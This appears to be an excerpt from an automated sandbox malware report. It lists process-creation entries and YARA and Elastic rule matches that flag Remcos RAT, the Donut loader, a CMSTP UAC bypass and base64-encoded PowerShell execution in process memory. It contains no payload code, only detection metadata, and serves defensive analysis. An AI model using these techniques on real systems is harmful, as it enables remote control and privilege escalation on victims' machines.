                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00416760 appears 69 times
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0000003C.00000002.3037711043.0000000005E4B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000046.00000002.4179942082.000000000AFF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000046.00000002.3558882823.0000000005A1C000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000000A.00000002.1664350212.000000000984B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000001B.00000002.1930013571.0000000006091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000001B.00000002.1932265209.0000000006131000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000027.00000002.2318491679.000000000916C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000A.00000002.1666563849.000000000A3D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000000A.00000002.1663974960.0000000008B48000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000A.00000002.1663209869.0000000008A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000016.00000002.1821567285.00000000085CC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000031.00000002.2611623646.0000000005C4B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000002C.00000002.2531189391.0000000008E9C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000001B.00000002.1976587463.000000000A541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000050.00000002.4176174475.00000000055DE000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000046.00000002.3519219272.000000000597C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000027.00000002.2239205630.000000000632B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000000A.00000002.1672116393.000000000A836000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000022.00000002.2082788404.00000000064CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000004B.00000002.3963998380.0000000005A85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000027.00000002.2235153189.000000000628A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000004B.00000002.4003774711.0000000005AED000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000041.00000002.3324693683.00000000060BB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000001B.00000002.1976169580.00000000095AC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000016.00000002.1789068655.00000000054C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000050.00000002.4142249719.000000000553E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000041.00000002.3951857716.00000000095DC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000037.00000002.2811950232.0000000005BFC000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000037.00000002.2798234763.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000003C.00000002.3020737620.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000003C.00000002.3350777711.0000000008C8C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000022.00000002.2153331440.000000000930C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000003C.00000002.3354412418.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000031.00000002.2605482729.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000031.00000002.2795920672.0000000008B1C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000046.00000002.4173144196.000000000888C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000016.00000002.1822042034.0000000009DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000022.00000002.2085983779.000000000656F000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000041.00000002.3295240918.000000000601B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000016.00000002.1790510884.0000000005560000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6580, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 6580, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5732, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 5732, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5288, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 5288, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
